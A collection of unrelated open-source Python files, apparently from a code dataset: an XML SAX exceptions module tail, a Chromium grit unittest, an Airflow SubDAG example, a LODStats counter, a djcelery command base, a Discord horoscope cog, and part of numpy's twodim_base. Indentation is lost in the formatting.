receive a SAXParseException as the argument to the handlers in the
ErrorHandler interface, the application is not actually required
to raise the exception; instead, it can simply read the
information in it and take a different action.
Since this exception is a subclass of SAXException, it inherits
the ability to wrap another exception."""
def __init__(self, msg, exception, locator):
"Creates the exception. The exception parameter is allowed to be None."
SAXException.__init__(self, msg, exception)
self._locator = locator
# We need to cache this stuff at construction time.
# If this exception is raised, the objects through which we must
# traverse to get this information may be deleted by the time
# it gets caught.
self._systemId = self._locator.getSystemId()
self._colnum = self._locator.getColumnNumber()
self._linenum = self._locator.getLineNumber()
def getColumnNumber(self):
"""The column number of the end of the text where the exception
occurred."""
return self._colnum
def getLineNumber(self):
"The line number of the end of the text where the exception occurred."
return self._linenum
def getPublicId(self):
"Get the public identifier of the entity where the exception occurred."
return self._locator.getPublicId()
def getSystemId(self):
"Get the system identifier of the entity where the exception occurred."
return self._systemId
def __str__(self):
"Create a string representation of the exception."
sysid = self.getSystemId()
if sysid is None:
sysid = "<unknown>"
linenum = self.getLineNumber()
if linenum is None:
linenum = "?"
colnum = self.getColumnNumber()
if colnum is None:
colnum = "?"
return "%s:%s:%s: %s" % (sysid, linenum, colnum, self._msg)
# ===== SAXNOTRECOGNIZEDEXCEPTION =====
class SAXNotRecognizedException(SAXException):
"""Exception class for an unrecognized identifier.
An XMLReader will raise this exception when it is confronted with an
unrecognized feature or property. SAX applications and extensions may
use this class for similar purposes."""
pass
# ===== SAXNOTSUPPORTEDEXCEPTION =====
class SAXNotSupportedException(SAXException):
"""Exception class for an unsupported operation.
An XMLReader will raise this exception when a service it cannot
perform is requested (specifically setting a state or value). SAX
applications and extensions may use this class for similar
purposes."""
pass
# ===== SAXNOTSUPPORTEDEXCEPTION =====
class SAXReaderNotAvailable(SAXNotSupportedException):
"""Exception class for a missing driver.
An XMLReader module (driver) should raise this exception when it
is first imported, e.g. when a support module cannot be imported.
It also may be raised during parsing, e.g. if executing an external
program is not permitted."""
pass
|
agpl-3.0
|
wuhengzhi/chromium-crosswalk
|
tools/grit/grit/format/chrome_messages_json_unittest.py
|
23
|
3612
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittest for chrome_messages_json.py.
"""
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
import StringIO
from grit import grd_reader
from grit import util
from grit.tool import build
class ChromeMessagesJsonFormatUnittest(unittest.TestCase):
def testMessages(self):
root = util.ParseGrdForUnittest(u"""
<messages>
<message name="IDS_SIMPLE_MESSAGE">
Simple message.
</message>
<message name="IDS_QUOTES">
element\u2019s \u201c<ph name="NAME">%s<ex>name</ex></ph>\u201d attribute
</message>
<message name="IDS_PLACEHOLDERS">
<ph name="ERROR_COUNT">%1$d<ex>1</ex></ph> error, <ph name="WARNING_COUNT">%2$d<ex>1</ex></ph> warning
</message>
<message name="IDS_PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE">
<ph name="BEGIN">$1<ex>a</ex></ph>test<ph name="END">$2<ex>b</ex></ph>
</message>
<message name="IDS_STARTS_WITH_SPACE">
''' (<ph name="COUNT">%d<ex>2</ex></ph>)
</message>
<message name="IDS_ENDS_WITH_SPACE">
(<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_SPACE_AT_BOTH_ENDS">
''' (<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_DOUBLE_QUOTES">
A "double quoted" message.
</message>
<message name="IDS_BACKSLASH">
\\
</message>
</messages>
""")
buf = StringIO.StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'en'),
buf)
output = buf.getvalue()
test = u"""
{
"SIMPLE_MESSAGE": {
"message": "Simple message."
},
"QUOTES": {
"message": "element\\u2019s \\u201c%s\\u201d attribute"
},
"PLACEHOLDERS": {
"message": "%1$d error, %2$d warning"
},
"PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE": {
"message": "$1$test$2$",
"placeholders": {
"1": {
"content": "$1"
},
"2": {
"content": "$2"
}
}
},
"STARTS_WITH_SPACE": {
"message": " (%d)"
},
"ENDS_WITH_SPACE": {
"message": "(%d) "
},
"SPACE_AT_BOTH_ENDS": {
"message": " (%d) "
},
"DOUBLE_QUOTES": {
"message": "A \\"double quoted\\" message."
},
"BACKSLASH": {
"message": "\\\\"
}
}
"""
self.assertEqual(test.strip(), output.strip())
def testTranslations(self):
root = util.ParseGrdForUnittest("""
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
""")
buf = StringIO.StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'fr'), buf)
output = buf.getvalue()
test = u"""
{
"ID_HELLO": {
"message": "H\\u00e9P\\u00e9ll\\u00f4P\\u00f4!"
},
"ID_HELLO_USER": {
"message": "H\\u00e9P\\u00e9ll\\u00f4P\\u00f4 %s"
}
}
"""
self.assertEqual(test.strip(), output.strip())
class DummyOutput(object):
def __init__(self, type, language):
self.type = type
self.language = language
def GetType(self):
return self.type
def GetLanguage(self):
return self.language
def GetOutputFilename(self):
return 'hello.gif'
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
NielsZeilemaker/incubator-airflow
|
airflow/example_dags/example_subdag_operator.py
|
44
|
1696
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import airflow
from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.subdag_operator import SubDagOperator
from airflow.example_dags.subdags.subdag import subdag
DAG_NAME = 'example_subdag_operator'
args = {
'owner': 'airflow',
'start_date': airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id=DAG_NAME,
default_args=args,
schedule_interval="@once",
)
start = DummyOperator(
task_id='start',
default_args=args,
dag=dag,
)
section_1 = SubDagOperator(
task_id='section-1',
subdag=subdag(DAG_NAME, 'section-1', args),
default_args=args,
dag=dag,
)
some_other_task = DummyOperator(
task_id='some-other-task',
default_args=args,
dag=dag,
)
section_2 = SubDagOperator(
task_id='section-2',
subdag=subdag(DAG_NAME, 'section-2', args),
default_args=args,
dag=dag,
)
end = DummyOperator(
task_id='end',
default_args=args,
dag=dag,
)
start.set_downstream(section_1)
section_1.set_downstream(some_other_task)
some_other_task.set_downstream(section_2)
section_2.set_downstream(end)
|
apache-2.0
|
AKSW/LODStats
|
lodstats/stats/Literals.py
|
2
|
1268
|
"""
Copyright 2013 AKSW Research Group http://aksw.org
This file is part of LODStats.
LODStats is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
LODStats is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with LODStats. If not, see <http://www.gnu.org/licenses/>.
"""
from .RDFStatInterface import RDFStatInterface
class Literals(RDFStatInterface):
"""
Distinct number of entities
Entity - triple, where ?s is iri (not blank)
"""
def __init__(self, results):
super(Literals, self).__init__(results)
self.c = 0
def count(self, s, p, o, s_blank, o_l, o_blank, statement):
if o_l:
self.c += 1
def postproc(self):
self.results['count'] = self.c
def voidify(self, void_model, dataset):
pass
def sparql(self, endpoint):
pass
|
gpl-3.0
|
hoosteeno/mozillians
|
vendor-local/lib/python/djcelery/management/base.py
|
15
|
3339
|
from __future__ import absolute_import
import os
import sys
from django.core.management.base import BaseCommand
import celery
import djcelery
DB_SHARED_THREAD = """\
DatabaseWrapper objects created in a thread can only \
be used in that same thread. The object with alias '%s' \
was created in thread id %s and this is thread id %s.\
"""
def patch_thread_ident():
# monkey patch django.
# This patch make sure that we use real threads to get the ident which
# is going to happen if we are using gevent or eventlet.
# -- patch taken from gunicorn
if getattr(patch_thread_ident, "called", False):
return
try:
from django.db.backends import BaseDatabaseWrapper, DatabaseError
if "validate_thread_sharing" in BaseDatabaseWrapper.__dict__:
import thread
_get_ident = thread.get_ident
__old__init__ = BaseDatabaseWrapper.__init__
def _init(self, *args, **kwargs):
__old__init__(self, *args, **kwargs)
self._thread_ident = _get_ident()
def _validate_thread_sharing(self):
if (not self.allow_thread_sharing
and self._thread_ident != _get_ident()):
raise DatabaseError(DB_SHARED_THREAD % (
self.alias, self._thread_ident, _get_ident()))
BaseDatabaseWrapper.__init__ = _init
BaseDatabaseWrapper.validate_thread_sharing \
= _validate_thread_sharing
patch_thread_ident.called = True
except ImportError:
pass
patch_thread_ident()
class CeleryCommand(BaseCommand):
options = BaseCommand.option_list
skip_opts = ["--app", "--loader", "--config"]
keep_base_opts = False
def get_version(self):
return "celery %s\ndjango-celery %s" % (celery.__version__,
djcelery.__version__)
def execute(self, *args, **options):
broker = options.get("broker")
if broker:
self.set_broker(broker)
super(CeleryCommand, self).execute(*args, **options)
def set_broker(self, broker):
os.environ["CELERY_BROKER_URL"] = broker
def run_from_argv(self, argv):
self.handle_default_options(argv[2:])
return super(CeleryCommand, self).run_from_argv(argv)
def handle_default_options(self, argv):
acc = []
broker = None
for i, arg in enumerate(argv):
if "--settings=" in arg:
_, settings_module = arg.split("=")
os.environ["DJANGO_SETTINGS_MODULE"] = settings_module
elif "--pythonpath=" in arg:
_, pythonpath = arg.split("=")
sys.path.insert(0, pythonpath)
elif "--broker=" in arg:
_, broker = arg.split("=")
elif arg == "-b":
broker = argv[i + 1]
else:
acc.append(arg)
if broker:
self.set_broker(broker)
return argv if self.keep_base_opts else acc
def die(self, msg):
sys.stderr.write(msg)
sys.stderr.write("\n")
sys.exit()
@property
def option_list(self):
return [x for x in self.options
if x._long_opts[0] not in self.skip_opts]
|
bsd-3-clause
|
Aioxas/ax-cogs
|
horoscope/horoscope.py
|
1
|
11258
|
from discord.ext import commands
from .utils.chat_formatting import box
import aiohttp
import html
import os
import re
try:
from PIL import Image, ImageDraw, ImageFont
PIL = True
except:
PIL = False
class Horoscope:
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession()
@commands.command(name="horo", pass_context=True, no_pm=True)
@commands.cooldown(10, 60, commands.BucketType.user)
async def _horoscope(self, ctx, *, sign: str):
"""Retrieves today's horoscope for a zodiac sign.
Works with both signs and birthdays. Make sure to do Month/Day.
Western Zodiac:
Capricorn, Aquarius, Pisces, Aries, Taurus, Gemini, Cancer, Leo,
Virgo, Libra, Scorpio Sagittarius.
For Chinese zodiac, it's chinese signs or year.
Chinese Zodiac:
Ox, Goat, Rat, Snake, Dragon, Tiger, Rabbit, Horse, Monkey,
Rooster, Dog, Pig
Examples: [p]horo love, virgo
[p]horo chinese, rooster
[p]horo daily, virgo
[p]horo whatever, virgo
[p]horo chinese, 1901
[p]horo love, 02/10"""
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
'AppleWebKit/537.36 (KHTML, lnamee Gecko) '
'Chrome/67.0.3396.99 Safari/537.36'}
signs = ["aries", "taurus", "gemini", "cancer", "leo",
"virgo", "libra", "scorpio", "sagittarius", "capricorn",
"aquarius", "pisces"]
chinese_signs = ["ox", "goat", "rat", "snake", "dragon", "tiger",
"rabbit", "horse", "monkey", "rooster", "dog", "pig"]
horo_styles = {"love": "https://www.horoscope.com/us/horoscopes/love/horoscope-love-daily-today.aspx?sign=",
"daily": "https://www.horoscope.com/us/horoscopes/general/horoscope-general-daily-today.aspx?sign=",
"chinese": "http://www.horoscope.com/us/horoscopes/chinese/horoscope-chinese-daily-today.aspx?sign="}
regex = [
"<strong( class=\"date\"|)>([^`]*?)<\/strong> - ([^`]*?)\n"]
subs = "\n\s*"
try:
horos = sign.split(', ')
style = horos[0]
horos.remove(style)
sign = horos[0].lower()
if style == "chinese":
if sign not in chinese_signs:
sign = self.getchinese_signs(int(sign)).lower()
uri = horo_styles[style]
sign_num = str(chinese_signs.index(sign) + 1)
uir = uri + sign_num
async with self.session.get(uir, headers=option) as resp:
test = str(await resp.text())
msg = re.findall(regex[0], test)[0]
msg_content = msg[2].replace("</p>", "")
msg = msg_content + " - " + msg[1]
await self.bot.say("Today's chinese horoscope for the one"
" born in the year of the {} is:\n"
.format(sign) + box(msg))
else:
if style not in horo_styles:
style = "daily"
if sign not in signs:
sign = sign.split("/")
Month = sign[0]
Day = sign[1]
sign = signs[self.getzodiac_signs(Month, Day)]
uri = horo_styles[style]
sign_num = str(signs.index(sign) + 1)
sign = list(sign)
sign[0] = sign[0].upper()
sign = "".join(sign)
uir = uri + sign_num
async with self.session.get(uir, headers=option) as resp:
test = str(await resp.text())
msg = re.findall(regex[0], test)[0]
msg_content = msg[2].replace("</p>", "")
msg = msg_content + " - " + msg[1]
if style == "love":
await self.bot.say("Today's love horoscope for **{}** is:\n"
.format(sign) + box(msg))
else:
await self.bot.say("Today's horoscope for **{}** is:\n"
.format(sign) + box(msg))
except (IndexError, ValueError):
await self.bot.say("Your search is not valid, please follow the "
"examples.\n[p]horo love, virgo\n[p]horo life,"
" pisces\n[p]horo whatever, sagittarius"
"\n[p]horo daily, virgo\n[p]horo chinese,"
" rooster")
def getzodiac_signs(self, Month, Day):
Month = int(Month)
Day = int(Day)
times = [((Month == 12 and Day >= 22)or(Month == 1 and Day <= 19)),
((Month == 1 and Day >= 20)or(Month == 2 and Day <= 17)),
((Month == 2 and Day >= 18)or(Month == 3 and Day <= 19)),
((Month == 3 and Day >= 20)or(Month == 4 and Day <= 19)),
((Month == 4 and Day >= 20)or(Month == 5 and Day <= 20)),
((Month == 5 and Day >= 21)or(Month == 6 and Day <= 20)),
((Month == 6 and Day >= 21)or(Month == 7 and Day <= 22)),
((Month == 7 and Day >= 23)or(Month == 8 and Day <= 22)),
((Month == 8 and Day >= 23)or(Month == 9 and Day <= 22)),
((Month == 9 and Day >= 23)or(Month == 10 and Day <= 22)),
((Month == 10 and Day >= 23)or(Month == 11 and Day <= 21)),
((Month == 11 and Day >= 22)or(Month == 12 and Day <= 21))]
for m in times:
if m:
return times.index(m)
def getchinese_signs(self, year):
czodiac = [(1900, "Rat"), (1901, "Ox"), (1902, "Tiger"),
(1903, "Rabbit"), (1904, "Dragon"), (1905, "Snake"),
(1906, "Horse"), (1907, "Sheep"), (1908, "Monkey"),
(1909, "Rooster"), (1910, "Dog"), (1911, "Pig")]
index = (year - czodiac[0][0]) % 12
return czodiac[index][1]
@commands.command(name="tsujiura", no_pm=True, alias=["senbei"])
@commands.cooldown(10, 60, commands.BucketType.user)
async def _cookie(self):
"""Retrieves a random fortune cookie fortune."""
regex = ["class=\"cookie-link\">([^`]*?)<\/a>", "<p>([^`]*?)<\/p>",
"(?:\\\\['])", "<strong>([^`]*?)<\/strong>",
"<\/strong><\/a>([^`]*?)<br>",
"3\)<\/strong><\/a>([^`]*?)<\/div>"]
url = "http://www.fortunecookiemessage.com"
await self.file_check()
async with self.session.get(url, headers={"encoding": "utf-8"}) as resp:
test = str(await resp.text())
fortune = re.findall(regex[0], test)
fortest = re.match("<p>", fortune[0])
if fortest is not None:
fortune = re.findall(regex[1], fortune[0])
title = re.findall(regex[3], test)
info = re.findall(regex[4], test)
info[0] = html.unescape(info[0])
dailynum = re.findall(regex[5], test)
self.fortune_process(fortune[0])
await self.bot.say("Your fortune is:")
await self.bot.upload("data/horoscope/cookie-edit.png")
await self.bot.say("\n" + title[1] +
info[1] + "\n" + title[2] + dailynum[0])
os.remove("data/horoscope/cookie-edit.png")
async def file_check(self):
urls = ["https://images-2.discordapp.net/.eJwNwcENwyAMAMBdGABDCWCyDSKIoCYxwuZVdff27qPWvNSuTpHBO8DRudA8NAvN3Kp"
"uRO2qeXTWhW7IIrmcd32EwQbjMCRMaJNxPmwILxcRg_9Da_yWYoQ3dV5z6fE09f0BC6EjAw.B0sII_QLbL9kJo6Zbb4GuO4MQNw",
"https://cdn.discordapp.com/attachments/218222973557932032/240223136447070208/FortuneCookieNF.ttf"]
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)'
' Gecko/20100101 Firefox/40.1'}
if os.path.exists("data/horoscope/cookie.png"):
async with self.session.get(urls[0], headers=option) as resp:
test = await resp.read()
meow = False
with open("data/horoscope/cookie.png", "rb") as e:
if len(test) != len(e.read()):
meow = True
if meow:
with open("data/horoscope/cookie.png", "wb") as f:
f.write(test)
elif not os.path.exists("data/horoscope/cookie.png"):
async with self.session.get(urls[0], headers=option) as resp:
test = await resp.read()
with open("data/horoscope/cookie.png", "wb") as f:
f.write(test)
if not os.path.exists("data/horoscope/FortuneCookieNF.ttf"):
async with self.session.get(urls[1], headers=option) as resp:
test = await resp.read()
with open("data/horoscope/FortuneCookieNF.ttf", "wb") as f:
f.write(test)
@commands.command(name="font", no_pm=True)
@commands.cooldown(10, 60, commands.BucketType.user)
async def _font(self, url: str=None):
"""Allows you to set the font that the fortune cookies are shown in.
Only accepts ttf."""
option = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)'
' Gecko/20100101 Firefox/40.1'}
if url is None :
url = "https://cdn.discordapp.com/attachments/218222973557932032/240223136447070208/FortuneCookieNF.ttf"
if os.is_file("data/horoscope/FortuneCookieNF.ttf"):
return
else:
async with self.session.get(url, headers=option) as resp:
test = await resp.read()
with open("data/horoscope/FortuneCookieNF.ttf", "wb") as f:
f.write(test)
elif not url.endswith("ttf"):
await self.bot.say("This is not a .ttf font, please use a .ttf font. Thanks")
return
await self.bot.say("Font has been saved")
def fortune_process(self, fortune):
img = Image.open("data/horoscope/cookie.png")
draw = ImageDraw.Draw(img)
font = ImageFont.truetype("data/horoscope/FortuneCookieNF.ttf", 15)
line = fortune.split()
sep = " "
line1 = sep.join(line[:5])
line2 = sep.join(line[5:10])
line3 = sep.join(line[10:])
draw.text((134, 165), line1, (0, 0, 0), font=font, align="center")
draw.text((134, 180), line2, (0, 0, 0), font=font, align="center")
draw.text((134, 195), line3, (0, 0, 0), font=font, align="center")
img.save("data/horoscope/cookie-edit.png")
def check_folders():
if not os.path.exists("data/horoscope"):
print("Creating data/horoscope folder...")
os.mkdir("data/horoscope")
def setup(bot):
if PIL:
check_folders()
n = Horoscope(bot)
bot.add_cog(n)
else:
raise RuntimeError("You need to run 'pip3 install Pillow'")
|
mit
|
gfyoung/numpy
|
numpy/lib/twodim_base.py
|
2
|
27180
|
""" Basic functions for manipulating 2d arrays
"""
from __future__ import division, absolute_import, print_function
import functools
from numpy.core.numeric import (
absolute, asanyarray, arange, zeros, greater_equal, multiply, ones,
asarray, where, int8, int16, int32, int64, empty, promote_types, diagonal,
nonzero
)
from numpy.core import overrides
from numpy.core import iinfo, transpose
__all__ = [
'diag', 'diagflat', 'eye', 'fliplr', 'flipud', 'tri', 'triu',
'tril', 'vander', 'histogram2d', 'mask_indices', 'tril_indices',
'tril_indices_from', 'triu_indices', 'triu_indices_from', ]
array_function_dispatch = functools.partial(
overrides.array_function_dispatch, module='numpy')
i1 = iinfo(int8)
i2 = iinfo(int16)
i4 = iinfo(int32)
def _min_int(low, high):
""" get small int that fits the range """
if high <= i1.max and low >= i1.min:
return int8
if high <= i2.max and low >= i2.min:
return int16
if high <= i4.max and low >= i4.min:
return int32
return int64
def _flip_dispatcher(m):
return (m,)
@array_function_dispatch(_flip_dispatcher)
def fliplr(m):
"""
Flip array in the left/right direction.
Flip the entries in each row in the left/right direction.
Columns are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array, must be at least 2-D.
Returns
-------
f : ndarray
A view of `m` with the columns reversed. Since a view
is returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
flipud : Flip array in the up/down direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to m[:,::-1]. Requires the array to be at least 2-D.
Examples
--------
>>> A = np.diag([1.,2.,3.])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.fliplr(A)
array([[ 0., 0., 1.],
[ 0., 2., 0.],
[ 3., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.fliplr(A) == A[:,::-1,...])
True
"""
m = asanyarray(m)
if m.ndim < 2:
raise ValueError("Input must be >= 2-d.")
return m[:, ::-1]
@array_function_dispatch(_flip_dispatcher)
def flipud(m):
"""
Flip array in the up/down direction.
Flip the entries in each column in the up/down direction.
Rows are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array.
Returns
-------
out : array_like
A view of `m` with the rows reversed. Since a view is
returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
fliplr : Flip array in the left/right direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to ``m[::-1,...]``.
Does not require the array to be two-dimensional.
Examples
--------
>>> A = np.diag([1.0, 2, 3])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.flipud(A)
array([[ 0., 0., 3.],
[ 0., 2., 0.],
[ 1., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.flipud(A) == A[::-1,...])
True
>>> np.flipud([1,2])
array([2, 1])
"""
m = asanyarray(m)
if m.ndim < 1:
raise ValueError("Input must be >= 1-d.")
return m[::-1, ...]
def eye(N, M=None, k=0, dtype=float, order='C'):
"""
Return a 2-D array with ones on the diagonal and zeros elsewhere.
Parameters
----------
N : int
Number of rows in the output.
M : int, optional
Number of columns in the output. If None, defaults to `N`.
k : int, optional
Index of the diagonal: 0 (the default) refers to the main diagonal,
a positive value refers to an upper diagonal, and a negative value
to a lower diagonal.
dtype : data-type, optional
Data-type of the returned array.
order : {'C', 'F'}, optional
Whether the output should be stored in row-major (C-style) or
column-major (Fortran-style) order in memory.
.. versionadded:: 1.14.0
Returns
-------
I : ndarray of shape (N,M)
An array where all elements are equal to zero, except for the `k`-th
diagonal, whose values are equal to one.
See Also
--------
identity : (almost) equivalent function
diag : diagonal 2-D array from a 1-D array specified by the user.
Examples
--------
>>> np.eye(2, dtype=int)
array([[1, 0],
[0, 1]])
>>> np.eye(3, k=1)
array([[ 0., 1., 0.],
[ 0., 0., 1.],
[ 0., 0., 0.]])
"""
if M is None:
M = N
m = zeros((N, M), dtype=dtype, order=order)
if k >= M:
return m
if k >= 0:
i = k
else:
i = (-k) * M
m[:M-k].flat[i::M+1] = 1
return m
def _diag_dispatcher(v, k=None):
return (v,)
@array_function_dispatch(_diag_dispatcher)
def diag(v, k=0):
"""
Extract a diagonal or construct a diagonal array.
See the more detailed documentation for ``numpy.diagonal`` if you use this
function to extract a diagonal and wish to write to the resulting array;
whether it returns a copy or a view depends on what version of numpy you
are using.
Parameters
----------
v : array_like
If `v` is a 2-D array, return a copy of its `k`-th diagonal.
If `v` is a 1-D array, return a 2-D array with `v` on the `k`-th
diagonal.
k : int, optional
Diagonal in question. The default is 0. Use `k>0` for diagonals
above the main diagonal, and `k<0` for diagonals below the main
diagonal.
Returns
-------
out : ndarray
The extracted diagonal or constructed diagonal array.
See Also
--------
diagonal : Return specified diagonals.
diagflat : Create a 2-D array with the flattened input as a diagonal.
trace : Sum along diagonals.
triu : Upper triangle of an array.
tril : Lower triangle of an array.
Examples
--------
>>> x = np.arange(9).reshape((3,3))
>>> x
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> np.diag(x)
array([0, 4, 8])
>>> np.diag(x, k=1)
array([1, 5])
>>> np.diag(x, k=-1)
array([3, 7])
>>> np.diag(np.diag(x))
array([[0, 0, 0],
[0, 4, 0],
[0, 0, 8]])
"""
v = asanyarray(v)
s = v.shape
if len(s) == 1:
n = s[0]+abs(k)
res = zeros((n, n), v.dtype)
if k >= 0:
i = k
else:
i = (-k) * n
res[:n-k].flat[i::n+1] = v
return res
elif len(s) == 2:
return diagonal(v, k)
else:
raise ValueError("Input must be 1- or 2-d.")
@array_function_dispatch(_diag_dispatcher)
def diagflat(v, k=0):
"""
Create a two-dimensional array with the flattened input as a diagonal.
Parameters
----------
v : array_like
Input data, which is flattened and set as the `k`-th
diagonal of the output.
k : int, optional
Diagonal to set; 0, the default, corresponds to the "main" diagonal,
a positive (negative) `k` giving the number of the diagonal above
(below) the main.
Returns
-------
out : ndarray
The 2-D output array.
See Also
--------
diag : MATLAB work-alike for 1-D and 2-D arrays.
diagonal : Return specified diagonals.
trace : Sum along diagonals.
Examples
--------
>>> np.diagflat([[1,2], [3,4]])
array([[1, 0, 0, 0],
[0, 2, 0, 0],
[0, 0, 3, 0],
[0, 0, 0, 4]])
>>> np.diagflat([1,2], 1)
array([[0, 1, 0],
[0, 0, 2],
[0, 0, 0]])
"""
try:
wrap = v.__array_wrap__
except AttributeError:
wrap = None
v = asarray(v).ravel()
s = len(v)
n = s + abs(k)
res = zeros((n, n), v.dtype)
if (k >= 0):
i = arange(0, n-k)
fi = i+k+i*n
else:
i = arange(0, n+k)
fi = i+(i-k)*n
res.flat[fi] = v
if not wrap:
return res
return wrap(res)
def tri(N, M=None, k=0, dtype=float):
"""
An array with ones at and below the given diagonal and zeros elsewhere.
Parameters
----------
N : int
Number of rows in the array.
M : int, optional
Number of columns in the array.
By default, `M` is taken equal to `N`.
k : int, optional
The sub-diagonal at and below which the array is filled.
`k` = 0 is the main diagonal, while `k` < 0 is below it,
and `k` > 0 is above. The default is 0.
dtype : dtype, optional
Data type of the returned array. The default is float.
Returns
-------
tri : ndarray of shape (N, M)
Array with its lower triangle filled with ones and zero elsewhere;
in other words ``T[i,j] == 1`` for ``i <= j + k``, 0 otherwise.
Examples
--------
>>> np.tri(3, 5, 2, dtype=int)
array([[1, 1, 1, 0, 0],
[1, 1, 1, 1, 0],
[1, 1, 1, 1, 1]])
>>> np.tri(3, 5, -1)
array([[ 0., 0., 0., 0., 0.],
[ 1., 0., 0., 0., 0.],
[ 1., 1., 0., 0., 0.]])
"""
if M is None:
M = N
m = greater_equal.outer(arange(N, dtype=_min_int(0, N)),
arange(-k, M-k, dtype=_min_int(-k, M - k)))
# Avoid making a copy if the requested type is already bool
m = m.astype(dtype, copy=False)
return m
def _trilu_dispatcher(m, k=None):
return (m,)
@array_function_dispatch(_trilu_dispatcher)
def tril(m, k=0):
"""
Lower triangle of an array.
Return a copy of an array with elements above the `k`-th diagonal zeroed.
Parameters
----------
m : array_like, shape (M, N)
Input array.
k : int, optional
Diagonal above which to zero elements. `k = 0` (the default) is the
main diagonal, `k < 0` is below it and `k > 0` is above.
Returns
-------
tril : ndarray, shape (M, N)
Lower triangle of `m`, of same shape and data-type as `m`.
See Also
--------
triu : same thing, only for the upper triangle
Examples
--------
>>> np.tril([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 0, 0, 0],
[ 4, 0, 0],
[ 7, 8, 0],
[10, 11, 12]])
"""
m = asanyarray(m)
mask = tri(*m.shape[-2:], k=k, dtype=bool)
return where(mask, m, zeros(1, m.dtype))
@array_function_dispatch(_trilu_dispatcher)
def triu(m, k=0):
"""
Upper triangle of an array.
Return a copy of a matrix with the elements below the `k`-th diagonal
zeroed.
Please refer to the documentation for `tril` for further details.
See Also
--------
tril : lower triangle of an array
Examples
--------
>>> np.triu([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 1, 2, 3],
[ 4, 5, 6],
[ 0, 8, 9],
[ 0, 0, 12]])
"""
m = asanyarray(m)
mask = tri(*m.shape[-2:], k=k-1, dtype=bool)
return where(mask, zeros(1, m.dtype), m)
def _vander_dispatcher(x, N=None, increasing=None):
return (x,)
# Originally borrowed from John Hunter and matplotlib
@array_function_dispatch(_vander_dispatcher)
def vander(x, N=None, increasing=False):
"""
Generate a Vandermonde matrix.
The columns of the output matrix are powers of the input vector. The
order of the powers is determined by the `increasing` boolean argument.
Specifically, when `increasing` is False, the `i`-th output column is
the input vector raised element-wise to the power of ``N - i - 1``. Such
a matrix with a geometric progression in each row is named for Alexandre-
Theophile Vandermonde.
Parameters
----------
x : array_like
1-D input array.
N : int, optional
Number of columns in the output. If `N` is not specified, a square
array is returned (``N = len(x)``).
increasing : bool, optional
Order of the powers of the columns. If True, the powers increase
from left to right, if False (the default) they are reversed.
.. versionadded:: 1.9.0
Returns
-------
out : ndarray
Vandermonde matrix. If `increasing` is False, the first column is
``x^(N-1)``, the second ``x^(N-2)`` and so forth. If `increasing` is
True, the columns are ``x^0, x^1, ..., x^(N-1)``.
See Also
--------
polynomial.polynomial.polyvander
Examples
--------
>>> x = np.array([1, 2, 3, 5])
>>> N = 3
>>> np.vander(x, N)
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> np.column_stack([x**(N-1-i) for i in range(N)])
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> x = np.array([1, 2, 3, 5])
>>> np.vander(x)
array([[ 1, 1, 1, 1],
[ 8, 4, 2, 1],
[ 27, 9, 3, 1],
[125, 25, 5, 1]])
>>> np.vander(x, increasing=True)
array([[ 1, 1, 1, 1],
[ 1, 2, 4, 8],
[ 1, 3, 9, 27],
[ 1, 5, 25, 125]])
The determinant of a square Vandermonde matrix is the product
of the differences between the values of the input vector:
>>> np.linalg.det(np.vander(x))
48.000000000000043
>>> (5-3)*(5-2)*(5-1)*(3-2)*(3-1)*(2-1)
48
"""
x = asarray(x)
if x.ndim != 1:
